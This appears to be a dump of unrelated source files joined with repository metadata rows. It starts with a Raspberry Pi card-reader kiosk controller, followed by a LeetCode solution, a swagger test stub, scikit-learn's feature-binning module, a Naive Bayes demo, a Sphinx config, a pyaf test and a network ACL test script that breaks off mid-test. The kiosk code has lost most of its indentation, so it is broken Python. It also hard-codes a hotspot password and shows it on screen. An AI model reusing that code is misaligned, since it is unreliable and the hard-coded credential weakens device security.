colorfijo2('24','100','111','100','111')
#controlluces=0
apb=0
if apb==0: #and controlluces == 1:
#luz=1
colorfijo2('24','111','100','111','100')
#controlluces=0
apb=1
#colorfijo2('25','000','100','000','000')
luz=0
#time.sleep(1)
#if ctk<10:
# ColorFijo(1,0,0)
def PantFull():
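    # Draws the idle "swipe your card" screen with prices and QR code, then
    # re-enables the card reader (retrying opcode 0x26 until the 'Z' ack
    # arrives).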
global EnvioPuerto
global ctk
global punto
global tarjeta
global controlluces
global TerminoOperacion
global ConfirmacionTarjeta
global tarjetalista
#infoObject = pygame.display.Info()
#screen=pygame.display.set_mode((infoObject.current_w, infoObject.current_h))
screen.fill((0,0,0))
#pygame.display.update()
bg = pygame.image.load("fraspi1.jpg")
#time.sleep(.050)
screen.blit(bg,(0,0))
# initialize font; must be called after 'pygame.init()' to avoid 'Font not Initialized' error
myfont =pygame.font.Font("super.ttf",30) #pygame.font.SysFont("monospace", 35)
myfont1 =pygame.font.Font("super.ttf",20)
myfont2 =pygame.font.Font("super.ttf",15)
# render text
label = myfont.render(LabelPase, 1, (255,255,255))
screen.blit(label,(((infoObject.current_w - label.get_width()) / 2)-50,40))#(label, (((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)))
#myfont = pygame.font.SysFont("monospace", 45)
myfont =pygame.font.Font("super.ttf",37)
label1A = myfont1.render('NORMAL', 1, (0,255,0))
screen.blit(label1A,(275,125))
label1 = myfont.render(str(PN), 1, (255,255,255))
screen.blit(label1,(275,150))
label2A = myfont1.render('VIP', 1, (0,255,0))
screen.blit(label2A,(275,225))
label2 = myfont.render(str(PV), 1, (255,255,255))
screen.blit(label2,(275,250))
label3 = myfont2.render('www.magneticash.com', 1, (255,255,255))
screen.blit(label3,(115,305))
QrImg = pygame.image.load('qr.png')
screen.blit(QrImg, (35,115))
pygame.display.flip()
pygame.display.update()
#while EnvioPuerto!='':
# b=1
#EnvioPuerto=activot
#while EnvioPuerto!='':
# b=1
#EnvioPuerto==''
#tarjeta==''
    punto=0
    ctk=0
tarjeta=''
time.sleep(0.050)
serie.flush()
ConfirmacionTarjeta=False
while ConfirmacionTarjeta==False:
serie.write(bytes(activot))
time.sleep(0.100)
TerminoOperacion=1
tarjetalista=1
#controlluces=1
#while EnvioPuerto!='':
# b=1
#colorfijo2('24','000','000','000','000')
def MuestraTarjeta():
#global confirmacion
global EnvioPuerto
global tarjeta
global punto
global haytarjeta
global YaEntre
global TerminoOperacion
YaEntre=0
while True:
if len(tarjeta)==15 and YaEntre==0 and TerminoOperacion==1:
print('entro a funcion debitar')
YaEntre=1
TerminoOperacion=0
Debitar()
#time.sleep(4)
if TerminoOperacion==1 and YaEntre==1:#len(tarjeta)==0
print('NO entro a funcion debitar')
YaEntre=0
#tarjeta=''
punto=0
def MiLuz():
global apb
if apb=='':
apb=0
while True:
b=1
if controlluces==0:#EnvioPuerto==''and tarjeta=='' and punto==0 and ctk==0:
luz2017('paseo')
def EnviarSerie():
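    # Sender thread: writes whatever frame is queued in EnvioPuerto, waits
    # for the 'U' ack, and retries with a 1.5-2 s timeout, dropping the
    # frame after repeated failures.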
global EnvioPuerto
global confirmacion
global ya
global hasta
global envie
global reintento
global tarjeta
reintento=0
envie=0
hasta=datetime.now()#+timedelta(milliseconds=1000)
while True:
ya=datetime.now()
#
if confirmacion==True and EnvioPuerto!='' and envie==0:
###print("envio")
envie=1
##print(bytes(EnvioPuerto))
reintento=0
hasta=datetime.now()+timedelta(milliseconds=1500)
confirmacion=False
serie.write(bytes(EnvioPuerto))
serie.flushOutput()
#EnvioPuerto=''
if envie==1 and confirmacion==True:
envie=0
EnvioPuerto=''
#tarjeta=''
if confirmacion==True and ya > hasta and EnvioPuerto!='' and reintento< 4 and envie==1:
#confirmacion=True
#EnvioPuerto=''
print("reintento placa")
#time.sleep(1)
##print(bytes(EnvioPuerto))
reintento=reintento+1
envie=1
hasta=datetime.now()+timedelta(milliseconds=2000)
confirmacion=False
serie.write(bytes(EnvioPuerto))
serie.flush()#Output()
#EnvioPuerto=''
if confirmacion==False and ya > hasta:
confirmacion=True
if reintento>=2:
EnvioPuerto=''
confirmacion=True
#---- General configuration -----
serie.write(bytes(desactivot))
infoObject = pygame.display.Info()
screen=pygame.display.set_mode((infoObject.current_w, infoObject.current_h))
pygame.mixer.pre_init(44100, -16, 2, 2048) # setup mixer to avoid sound lag
pygame.mixer.init()
pygame.mixer.music.set_volume(0.5)
#pygame.mouse.set_visible(s)
pygame.mouse.set_visible(0)
myfont = pygame.font.SysFont("monospace", 40)
pygame.display.toggle_fullscreen()
#---- START 2018 E.E.C
controlluces=1
#listener threads start first (2018)
#EscuchaConfig=threading.Thread(target=listen)
#EscuchaConfig.start()
#time.sleep(5.0)
#escuchar=threading.Thread(target=EscuchoPuerto)
#escuchar.start()
#mserie=threading.Thread(target=PuertoSerie)
#mserie.start()
mpantalla=threading.Thread(target=Pantalla)
mpantalla.start()
#break
#exit#2018-test
#Start by checking whether a machine number exists; otherwise stay in config mode
#---look for the machine-number config file
#---and the local wifi config file
tengoIP=0
try:
file=open("/home/pi/ControllerConfig/mip.mc","r")
file.close()
tengoIP=1
except:
print('Archivo mip.mc inexistente')
tengoIP=0
if tengoIP==1:
print('Abriendo Controller...')
# escuchar.terminate()
# EscuchaConfig.terminate()
os.system("sudo python3 /home/pi/Controller.py -f")
pygame.quit()
sys.exit()
else:
#controlluces=1
#msj=ObtenerMac('wlan0')
msj=subprocess.check_output("cat /sys/class/net/wlan0/address",shell=True).decode('utf8')
MiMac1=msj.strip()
    #saveQRCodePNG('qrip',3,MiIp) # generate a QR code with the machine number
time.sleep(0.3)
IPFINAL=''
while IPFINAL=='':
screen.fill((0,0,0))
        pygame.font.init()
myfont =pygame.font.Font("super.ttf",30)
myfont1 =pygame.font.SysFont("comicsansms",30)
myfont2 =pygame.font.SysFont("comicsansms",30)
bg = pygame.image.load("fondot.jpg")
screen.blit(bg,(0,0))
esto='Configurando IP FINAL...'
label = myfont.render("CONFIGURACION INICIAL", 1, (0,255,20))
screen.blit(label,(((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-60))
myfont =pygame.font.Font("super.ttf",20)
label1 = myfont.render(esto, 1, (255,255,255))
screen.blit(label1,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-25))
msj=subprocess.check_output("iw dev wlan0 link|grep SSID|awk '{print $2}'",shell=True).decode('utf8')
esto=msj.strip()
print(esto)
if esto!='':
esto='Conectado con ' + esto
label3 = myfont2.render("Buscando CtrlAdm Soft", 1, (0,255,255))
else:
            # create the hotspot network configuration file
msj=subprocess.check_output("cat /sys/class/net/wlan0/address",shell=True).decode('utf8')
MiMac1=msj.strip()
#MiMac1=MiMac1[0:2]+MiMac1[3:5]+MiMac1[6:8]+MiMac1[9:11]+MiMac1[12:14]+MiMac1[15:17]
#print(MiMac1)
esto='Connect to Controller ' + str(MiMac1)
label3 = myfont2.render("Password: MagneticCash123456", 1, (255,255,255))
label2 = myfont1.render(esto, 1, (255,255,255))
screen.blit(label2,(((infoObject.current_w - label2.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+100))
screen.blit(label3,(((infoObject.current_w - label3.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+127))
QrImg = pygame.image.load('qrip.png')
screen.blit(QrImg, (185,140))
pygame.display.flip()
pygame.display.update()
#DosMundos()
colorfijo2('24','100','101','001','010')
time.sleep(1.0)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('192.168.1.30',6000)#192.168.2.50 -- IAAPA
#print('connecting to %s port %s' % server_address)
sock.settimeout(1.0)
sock.connect(server_address)
#print('paso conexion')
#sock.settimeout(3.0)
message=MiMac1#+','+MiIp+','+NumMaq+'$XX'
#print(message)
sock.sendall(message.encode(encoding='UTF-8',errors='ignore'))
amount_received = 0
amount_expected = 1#len(message)
data1=''
data=''
while data=='':
data = sock.recv(16)
data=data.decode('utf8')
IPFINAL=data
break
except:
b=1
continue
    #--------
    #When an IP is obtained, save it to the config file and restart
file=open("/home/pi/ControllerConfig/mip.mc","w")
file.write(str(IPFINAL))
file.close()
print('termino')
screen.fill((0,0,0))
    pygame.font.init()
myfont =pygame.font.Font("super.ttf",30)
myfont1 =pygame.font.SysFont("comicsansms",30)
myfont2 =pygame.font.SysFont("comicsansms",40)
bg = pygame.image.load("fondot.jpg")
screen.blit(bg,(0,0))
esto='IP FINAL OK'
label = myfont.render("Reiniciando Controller...", 1, (0,255,20))
screen.blit(label,(((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-60))
myfont =pygame.font.Font("super.ttf",20)
label1 = myfont.render(esto, 1, (255,255,255))
screen.blit(label1,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-25))
msj=subprocess.check_output("iw dev wlan0 link|grep SSID|awk '{print $2}'",shell=True).decode('utf8')
esto=msj.strip()
esto='Conectado con ' + esto
label3 = myfont2.render("Ip recibida "+str(IPFINAL), 1, (0,255,255))
# else:
        # create the hotspot network configuration file
# msj=subprocess.check_output("cat /sys/class/net/wlan0/address",shell=True).decode('utf8')
# MiMac1=msj.strip()
#MiMac1=MiMac1[0:2]+MiMac1[3:5]+MiMac1[6:8]+MiMac1[9:11]+MiMac1[12:14]+MiMac1[15:17]
#print(MiMac1)
#esto='Connect to Controller ' + str(MiMac1)
#label3 = myfont2.render("Password: MagneticCash123456", 1, (255,255,255))
#label2 = myfont1.render(esto, 1, (255,255,255))
#screen.blit(label2,(((infoObject.current_w - label2.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+100))
screen.blit(label3,(((infoObject.current_w - label3.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+127))
#QrImg = pygame.image.load('qrip.png')
#screen.blit(QrImg, (185,140))
pygame.display.flip()
pygame.display.update()
#file1=open("/home/pi/ControllerConfig/ConWifi.conf","w")
#file1.write('option domain_name_servers, domain_name, domain_search, host_name\r\n')
#file1.write('option classless_static_routes\r\n')
#file1.write('option ntp_servers\r\n')
#file1.write('require dhcp_server_identifier\r\n')
#file1.write('nohook lookup-hostname\r\n')
#file1.write('SSID MagneticashAP\r\n')
#file1.write('inform '+str(IPFINAL)+'\r\n')
#file1.write('static routers=10.0.0.1\r\n')
#file1.write('static domain_name_servers=10.0.0.1\r\n')
#file1.write('static domain_search=8.8.8.8')
#file1.close()
colorfijo2('28','100','100','100','111')
time.sleep(5.0)
colorfijo2('28','100','110','111','000')
time.sleep(1.0)
#end
os.system("sudo python3 /home/pi/Controller.py -f")
#os.system("sudo reboot")
#sys.exit()
| [
"[email protected]"
] | |
dac804c33230879d67dd611d93deb94b2adc451b | bfe6c95fa8a2aae3c3998bd59555583fed72900a | /sumRootToLeaf.py | ee43ddceb5b9ce42b6f787cf5ea3e662d9ad0968 | [] | no_license | zzz136454872/leetcode | f9534016388a1ba010599f4771c08a55748694b2 | b5ea6c21bff317884bdb3d7e873aa159b8c30215 | refs/heads/master | 2023-09-01T17:26:57.624117 | 2023-08-29T03:18:56 | 2023-08-29T03:18:56 | 240,464,565 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 534 | py | from typing import Optional
from pytree import TreeNode
class Solution:
def sumRootToLeaf(self, root: Optional[TreeNode]) -> int:
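        # Each root-to-leaf path spells a binary number (the root bit is most
        # significant); dfs() accumulates value = 2*value + node.val and adds
        # the finished number to res at every leaf.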
value = 0
res = 0
def dfs(root, value):
if not root:
return
value = 2 * value + root.val
if not root.left and not root.right:
nonlocal res
res += value
return
dfs(root.left, value)
dfs(root.right, value)
dfs(root, 0)
return res
| [
"[email protected]"
] | |
d5347447760b6c6389ec49923408c533d457bf16 | f865fdd970f8e37ea2aa5157374af8c4d6ced987 | /test/test_vehicle_list_list.py | 249ea92d8240a677b23124e6d62fb0bcd81d0216 | [] | no_license | gkeep-openapi/python-sdk | 7e809448355bff535b3d64e013f001e9196c5e19 | 7c4f3785b47a110386ef10109619654522c95de5 | refs/heads/master | 2022-05-28T16:13:06.643958 | 2022-05-13T14:58:39 | 2022-05-13T14:58:39 | 235,536,010 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 833 | py | # coding: utf-8
"""
Gkeep API
Gkeep API # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from models.vehicle_list_list import VehicleListList # noqa: E501
from swagger_client.rest import ApiException
class TestVehicleListList(unittest.TestCase):
"""VehicleListList unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testVehicleListList(self):
"""Test VehicleListList"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.vehicle_list_list.VehicleListList() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"gkeep-ci-jenkins"
] | gkeep-ci-jenkins |
a2f7553243715ba929281bd6d1ad9e7e468575ee | b5e8dc7c21659ac33b6e242a298a44d30bfa3610 | /env-prod/Lib/site-packages/sklearn/ensemble/_hist_gradient_boosting/binning.py | 836a2e0fa2447e9f9d31c9d25b907854bf070985 | [] | no_license | rpuegue/CoursA61 | c168b44cd9835ad7524c97b2983305c56acd8096 | a4fc8f7504491eb94cb2f1d2bf6d16674901a0c5 | refs/heads/main | 2023-03-10T09:08:31.293546 | 2021-02-22T16:25:51 | 2021-02-22T16:25:51 | 339,574,678 | 0 | 0 | null | 2021-02-22T16:25:51 | 2021-02-17T00:57:41 | Python | UTF-8 | Python | false | false | 8,304 | py | """
This module contains the BinMapper class.
BinMapper is used for mapping a real-valued dataset into integer-valued bins.
Bin thresholds are computed with the quantiles so that each bin contains
approximately the same number of samples.
"""
# Author: Nicolas Hug
import numpy as np
from ...utils import check_random_state, check_array
from ...base import BaseEstimator, TransformerMixin
from ...utils.validation import check_is_fitted
from ._binning import _map_to_bins
from .common import X_DTYPE, X_BINNED_DTYPE, ALMOST_INF
def _find_binning_thresholds(data, max_bins, subsample, random_state):
"""Extract feature-wise quantiles from numerical data.
Missing values are ignored for finding the thresholds.
Parameters
----------
data : array-like, shape (n_samples, n_features)
The data to bin.
max_bins: int
The maximum number of bins to use for non-missing values. If for a
given feature the number of unique values is less than ``max_bins``,
then those unique values will be used to compute the bin thresholds,
instead of the quantiles.
subsample : int or None
If ``n_samples > subsample``, then ``sub_samples`` samples will be
randomly chosen to compute the quantiles. If ``None``, the whole data
is used.
random_state: int or numpy.random.RandomState or None
Pseudo-random number generator to control the random sub-sampling.
See :term:`random_state`.
Return
------
binning_thresholds: list of arrays
For each feature, stores the increasing numeric values that can
be used to separate the bins. Thus ``len(binning_thresholds) ==
n_features``.
"""
rng = check_random_state(random_state)
if subsample is not None and data.shape[0] > subsample:
subset = rng.choice(np.arange(data.shape[0]), subsample, replace=False)
data = data.take(subset, axis=0)
binning_thresholds = []
for f_idx in range(data.shape[1]):
col_data = data[:, f_idx]
# ignore missing values when computing bin thresholds
missing_mask = np.isnan(col_data)
if missing_mask.any():
col_data = col_data[~missing_mask]
col_data = np.ascontiguousarray(col_data, dtype=X_DTYPE)
distinct_values = np.unique(col_data)
if len(distinct_values) <= max_bins:
midpoints = distinct_values[:-1] + distinct_values[1:]
midpoints *= .5
else:
# We sort again the data in this case. We could compute
# approximate midpoint percentiles using the output of
# np.unique(col_data, return_counts) instead but this is more
# work and the performance benefit will be limited because we
# work on a fixed-size subsample of the full data.
percentiles = np.linspace(0, 100, num=max_bins + 1)
percentiles = percentiles[1:-1]
midpoints = np.percentile(col_data, percentiles,
interpolation='midpoint').astype(X_DTYPE)
assert midpoints.shape[0] == max_bins - 1
# We avoid having +inf thresholds: +inf thresholds are only allowed in
# a "split on nan" situation.
np.clip(midpoints, a_min=None, a_max=ALMOST_INF, out=midpoints)
binning_thresholds.append(midpoints)
return binning_thresholds
class _BinMapper(TransformerMixin, BaseEstimator):
"""Transformer that maps a dataset into integer-valued bins.
The bins are created in a feature-wise fashion, using quantiles so that
each bins contains approximately the same number of samples.
For large datasets, quantiles are computed on a subset of the data to
speed-up the binning, but the quantiles should remain stable.
Features with a small number of values may be binned into less than
``n_bins`` bins. The last bin (at index ``n_bins - 1``) is always reserved
for missing values.
Parameters
----------
n_bins : int, optional (default=256)
The maximum number of bins to use (including the bin for missing
values). Non-missing values are binned on ``max_bins = n_bins - 1``
bins. The last bin is always reserved for missing values. If for a
given feature the number of unique values is less than ``max_bins``,
then those unique values will be used to compute the bin thresholds,
instead of the quantiles.
subsample : int or None, optional (default=2e5)
If ``n_samples > subsample``, then ``sub_samples`` samples will be
randomly chosen to compute the quantiles. If ``None``, the whole data
is used.
random_state: int or numpy.random.RandomState or None, \
optional (default=None)
Pseudo-random number generator to control the random sub-sampling.
See :term:`random_state`.
Attributes
----------
bin_thresholds_ : list of arrays
For each feature, gives the real-valued bin threhsolds. There are
``max_bins - 1`` thresholds, where ``max_bins = n_bins - 1`` is the
number of bins used for non-missing values.
n_bins_non_missing_ : array of uint32
For each feature, gives the number of bins actually used for
non-missing values. For features with a lot of unique values, this is
equal to ``n_bins - 1``.
missing_values_bin_idx_ : uint8
The index of the bin where missing values are mapped. This is a
constant across all features. This corresponds to the last bin, and
it is always equal to ``n_bins - 1``. Note that if ``n_bins_missing_``
is less than ``n_bins - 1`` for a given feature, then there are
empty (and unused) bins.
"""
def __init__(self, n_bins=256, subsample=int(2e5), random_state=None):
self.n_bins = n_bins
self.subsample = subsample
self.random_state = random_state
def fit(self, X, y=None):
"""Fit data X by computing the binning thresholds.
The last bin is reserved for missing values, whether missing values
are present in the data or not.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The data to bin.
y: None
Ignored.
Returns
-------
self : object
"""
if not (3 <= self.n_bins <= 256):
# min is 3: at least 2 distinct bins and a missing values bin
raise ValueError('n_bins={} should be no smaller than 3 '
'and no larger than 256.'.format(self.n_bins))
X = check_array(X, dtype=[X_DTYPE], force_all_finite=False)
max_bins = self.n_bins - 1
self.bin_thresholds_ = _find_binning_thresholds(
X, max_bins, subsample=self.subsample,
random_state=self.random_state)
self.n_bins_non_missing_ = np.array(
[thresholds.shape[0] + 1 for thresholds in self.bin_thresholds_],
dtype=np.uint32)
self.missing_values_bin_idx_ = self.n_bins - 1
return self
def transform(self, X):
"""Bin data X.
Missing values will be mapped to the last bin.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The data to bin.
Returns
-------
X_binned : array-like, shape (n_samples, n_features)
The binned data (fortran-aligned).
"""
X = check_array(X, dtype=[X_DTYPE], force_all_finite=False)
check_is_fitted(self)
if X.shape[1] != self.n_bins_non_missing_.shape[0]:
raise ValueError(
'This estimator was fitted with {} features but {} got passed '
'to transform()'.format(self.n_bins_non_missing_.shape[0],
X.shape[1])
)
binned = np.zeros_like(X, dtype=X_BINNED_DTYPE, order='F')
_map_to_bins(X, self.bin_thresholds_, self.missing_values_bin_idx_,
binned)
return binned
| [
"[email protected]"
] | |
fbf785d429c68337f3d04cbc3305b64d88758482 | 9b20743ec6cd28d749a4323dcbadb1a0cffb281b | /07_Machine_Learning_Mastery_with_Python/10/gaussian_naive_bayes.py | b5529aced1162296ffe0b53527fd96f38568671a | [] | no_license | jggrimesdc-zz/MachineLearningExercises | 6e1c7e1f95399e69bba95cdfe17c4f8d8c90d178 | ee265f1c6029c91daff172b3e7c1a96177646bc5 | refs/heads/master | 2023-03-07T19:30:26.691659 | 2021-02-19T08:00:49 | 2021-02-19T08:00:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 581 | py | # Gaussian Naive Bayes Classification
from pandas import read_csv
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score
from sklearn.naive_bayes import GaussianNB
filename = 'pima-indians-diabetes.data.csv'
names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class']
dataframe = read_csv(filename, names=names)
array = dataframe.values
X = array[:, 0:8]
Y = array[:, 8]
kfold = KFold(n_splits=10, random_state=7, shuffle=True)
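# Evaluate with 10-fold cross-validation; the mean printed below is the
# average classification accuracy over the 10 held-out folds.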
model = GaussianNB()
results = cross_val_score(model, X, Y, cv=kfold)
print(results.mean())
| [
"[email protected]"
] | |
18c40f470894a9af81555213d823493761650de6 | 4d8439664d716ce811046969f806ccfc3fbe1add | /docs/conf.py | 11e878a9d35bb089081795e459d74eb979c3f16f | [
"MIT"
] | permissive | BuysDB/SingleCellMultiOmics | b32519be6d4a79d8c80050f91e600aceedb9983f | 441f378cbfb0af165f1ada5b8596362412b3cc48 | refs/heads/master | 2023-07-25T17:39:18.371642 | 2023-06-21T07:30:31 | 2023-06-21T07:30:31 | 187,592,829 | 21 | 9 | MIT | 2023-06-21T07:30:32 | 2019-05-20T07:47:28 | Python | UTF-8 | Python | false | false | 5,677 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# SingleCellMultiOmics documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 16 11:59:02 2019.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
import glob
#sys.path.insert(0, os.path.abspath('../singlecellmultiomics/'))
sys.path.insert(0, os.path.abspath('../singlecellmultiomics'))
import sphinx_rtd_theme
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx_rtd_theme",
'sphinx.ext.autosummary',
'sphinx.ext.autodoc',
'sphinx.ext.coverage',
#'sphinx.ext.mathjax',
'sphinx.ext.viewcode',
    'sphinx.ext.githubpages',
    'sphinx.ext.napoleon',
]
# Napoleon settings
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_init_with_doc = False
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
add_module_names = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'SingleCellMultiOmics'
copyright = '2019, Buys de Barbanson, Jake Yeung'
author = 'Buys de Barbanson, Jake Yeung'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.0.2'
# The full version, including alpha/beta/rc tags.
release = '0.0.2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'SingleCellMultiOmicsdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'SingleCellMultiOmics.tex', 'SingleCellMultiOmics Documentation',
'Buys de Barbanson, Jake Yeung', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'singlecellmultiomics', 'SingleCellMultiOmics Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'SingleCellMultiOmics', 'SingleCellMultiOmics Documentation',
author, 'SingleCellMultiOmics', 'One line description of project.',
'Miscellaneous'),
]
| [
"[email protected]"
] | |
8acf901f02911518883bb83b3ee13e1155dde5be | 971e0efcc68b8f7cfb1040c38008426f7bcf9d2e | /tests/artificial/transf_Integration/trend_LinearTrend/cycle_12/ar_12/test_artificial_1024_Integration_LinearTrend_12_12_0.py | ce9ad4b11a32844c2d9b12c61134643c26fb5ac1 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | antoinecarme/pyaf | a105d172c2e7544f8d580d75f28b751351dd83b6 | b12db77cb3fa9292e774b2b33db8ce732647c35e | refs/heads/master | 2023-09-01T09:30:59.967219 | 2023-07-28T20:15:53 | 2023-07-28T20:15:53 | 70,790,978 | 457 | 77 | BSD-3-Clause | 2023-03-08T21:45:40 | 2016-10-13T09:30:30 | Python | UTF-8 | Python | false | false | 270 | py | import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 1024 , FREQ = 'D', seed = 0, trendtype = "LinearTrend", cycle_length = 12, transform = "Integration", sigma = 0.0, exog_count = 0, ar_order = 12); | [
"[email protected]"
] | |
52ddde778566b011bf474203eeaab73b80a92abd | e1e5ffef1eeadd886651c7eaa814f7da1d2ade0a | /Systest/tests/acl-new/ACL_FUN_055.py | 56f2d44de7774024373f48e52761bd1fba98265a | [] | no_license | muttu2244/MyPython | 1ddf1958e5a3514f9605d1f83c0930b24b856391 | 984ca763feae49a44c271342dbc15fde935174cf | refs/heads/master | 2021-06-09T02:21:09.801103 | 2017-10-10T07:30:04 | 2017-10-10T07:30:04 | 13,803,605 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,939 | py | #!/usr/bin/env python2.5
"""
#######################################################################
#
# Copyright (c) Stoke, Inc.
# All Rights Reserved.
#
# This code is confidential and proprietary to Stoke, Inc. and may only
# be used under a license from Stoke.
#
#######################################################################
DESCRIPTION: To verify applying an outbound access-list to a port interface
TEST PLAN: ACL Test plans
TEST CASES:ACL_FUN_055
TOPOLOGY :
Linux1 (17.1.1.1/24) -> 3/0 (17.1.1.2/24) SSX
SSX (16.1.1.2/24) 2/0 -> Linux2 (16.1.1.1/24)
HOW TO RUN:python2.5 ACL_FUN_055.py
AUTHOR: [email protected]
REVIEWER:
"""
import sys, os
mydir = os.path.dirname(__file__)
qa_lib_dir = os.path.join(mydir, "../../lib/py")
if qa_lib_dir not in sys.path:
sys.path.insert(1,qa_lib_dir)
#Import Frame-work libraries
from SSX import *
from Linux import *
from log import *
from StokeTest import test_case, test_suite, test_runner
from log import buildLogger
from logging import getLogger
from acl import *
from helpers import is_healthy
from misc import *
#import config and topo file
from config import *
from topo import *
class test_ACL_FUN_055(test_case):
myLog = getLogger()
def setUp(self):
#Establish a telnet session to the SSX box.
self.ssx = SSX(ssx["ip_addr"])
self.linux=Linux(linux['ip_addr'],linux['user_name'],linux['password'])
self.linux1=Linux(linux1['ip_addr'],linux1['user_name'],linux1['password'])
self.ssx.telnet()
self.linux.telnet()
self.linux1.telnet()
# Clear the SSX config
self.ssx.clear_config()
# wait for card to come up
self.ssx.wait4cards()
self.ssx.clear_health_stats()
def tearDown(self):
# Close the telnet session of SSX
self.ssx.close()
self.linux.close()
self.linux1.close()
def test_ACL_FUN_055(self):
# Push SSX config
self.ssx.config_from_string(script_var['ACL_FUN_055'])
self.linux1.configure_ip_interface(p1_ssx_linux1[1], script_var['linux_phy_iface1_ip_mask'])
self.linux1.configure_ip_interface(p1_ssx_linux2[1], script_var['linux_phy_iface2_ip_mask'])
self.linux.cmd("sudo /sbin/route add -net %s gw %s" %(script_var['client1_route'],script_var['client1_gateway']))
self.linux1.cmd("sudo /sbin/route add -net %s gw %s" %(script_var['client2_route'],script_var['client2_gateway']))
#changing context and clear port counters
self.ssx.cmd("context %s" %(script_var['context_name']))
self.ssx.cmd("clear ip access-list name subacl counters")
        #generate ICMP packets with ping (exercises the outbound ICMP deny rule)
self.linux.cmd("ping -c 5 %s"%(script_var['linux_phy_iface2_ip']),timeout=40)
result=self.ssx.cmd("show ip access-list name subacl counters")
result=result.split('\n')
result=result[2]
result=result.split(' ')
output=result[5]
output=int(output)
self.failIfEqual(output,0,"Deny Outbound ICMP Failed")
        self.ssx.cmd("clear ip access-list name subacl counters")
        #craft a TCP packet with the nemesis tool (exercises the outbound TCP permit rule)
        self.linux.cmd("sudo /usr/local/bin/nemesis tcp -S %s -D %s -d %s"%(script_var['linux_phy_iface1_ip'],script_var['linux_phy_iface2_ip'],p1_ssx_xpressvpn[1]))
result=self.ssx.cmd("show ip access-list name subacl counters")
result=result.split('\n')
result=result[2]
